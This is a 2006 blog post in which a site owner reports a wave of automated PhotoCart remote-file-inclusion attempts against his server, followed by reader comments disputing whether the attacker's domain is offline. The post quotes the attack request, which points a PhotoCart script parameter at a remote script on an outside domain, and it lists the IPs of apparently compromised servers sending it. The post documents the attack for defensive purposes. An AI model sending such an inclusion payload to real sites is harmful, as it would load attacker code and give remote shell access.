Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up since there were only a few attempts after my last post. Sadly, that wasn't the case and when I got up this morning and checked the site stats I found they mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forest Gump's mother correct as "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which appears to give them shell access from a casual glance of the code.


Here's all the sites involved in today's attack:

70.86.151.130 [82.97.5646.static.theplanet.com.] requested 49 pages as "libwww-perl/5.65"
72.29.74.43 [deso.surpasshosting.com.] requested 53 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 84 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.29.83.98 [jet33.hasweb.com.] requested 54 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 75 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 75 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 32 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 62 pages as "libwww-perl/5.803"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 64 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
66.103.152.111 [server22.internet-hosting-services.com.] requested 55 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 72 pages as "libwww-perl/5.805"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
69.10.142.59 [unknown.rackforce.com.] requested 108 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 83 pages as "libwww-perl/5.801"
67.159.26.99 [.] requested 60 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 70 pages as "libwww-perl/5.801"
203.194.134.166 [unknown] requested 22 pages as "libwww-perl/5.65"
81.169.186.195 [unknown] requested 33 pages as "libwww-perl/5.803"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 67 pages as "libwww-perl/5.801"
207.158.61.3 [ns1.control8.com.] requested 77 pages as "libwww-perl/5.79"
85.214.19.18 [copyworld-kiel.de.] requested 25 pages as "libwww-perl/5.69"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 35 pages as "libwww-perl/5.803"
203.146.140.221 [unknown] requested 12 pages as "libwww-perl/5.64"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
207.99.63.90 [www.myonlinephotos.net.] requested 31 pages as "libwww-perl/5.79"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 11 pages as "libwww-perl/5.79"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 12 pages as "libwww-perl/5.803"
62.221.213.68 [unknown] requested 9 pages as "libwww-perl/5.65"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 9 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 30 pages as "libwww-perl/5.805"
203.167.88.76 [unknown] requested 14 pages as "libwww-perl/5.65"
195.242.211.253 [faq.ecobike.de.] requested 24 pages as "libwww-perl/5.48"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"


Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.

9 comments:

Anonymous said...

A 403 error page is a script capable of granting shell access? That's a new one on me...

IncrediBILL said...

Don't be a wise guy.

It looks like they took the entire domain offline so someone must've complained about being attacked.

Wish I'd kept a copy of the code, maybe I'll archive it next time if they launch another attack.

Anonymous said...

You appear to be mixing up 403 and Host Unknown errors here.

IncrediBILL said...

Sorry, but I'm not the one confused, you are. The status of the site has changed twice since I wrote the blog post.

You think the status quo would last on a domain involved in an attack?

Come on people, adapt to changing situations, sheesh.

Anonymous said...

I agree with anonymous, you're totally confused. That's a 403 error code and you're the one sending an attack to an innocent website.

IncrediBILL said...

OK, you're confused as well, the domain is OFFLINE....

curl panoplanet.com
curl: (7) socket error: 111

That's not a 403 or any other damn thing, it's toast and I just verified that from my computer, 2 anonymous proxies and from the command line on 2 servers.

Would you like fries with that?

IncrediBILL said...

Let's examine the infallible logic in your statement: I suck because I proved you wrong, fascinating.

If being correct means sucking, I'd prefer to suck than be you.

Anonymous said...

That's a different result than what I got. What I got was a 403 error from what was clearly a functioning HTTP server at the time.

IncrediBILL said...

Then you might want to upgrade to a better service with a fresh DNS cache as you should get a CONNECTION REFUSED, you can't even open a socket.

Besides, WHO CARES?

It's not even important, that site is down, the new site is here:

http://incredibill.blogspot.com/2006/12/next-wave-photocart-attack-with-new.html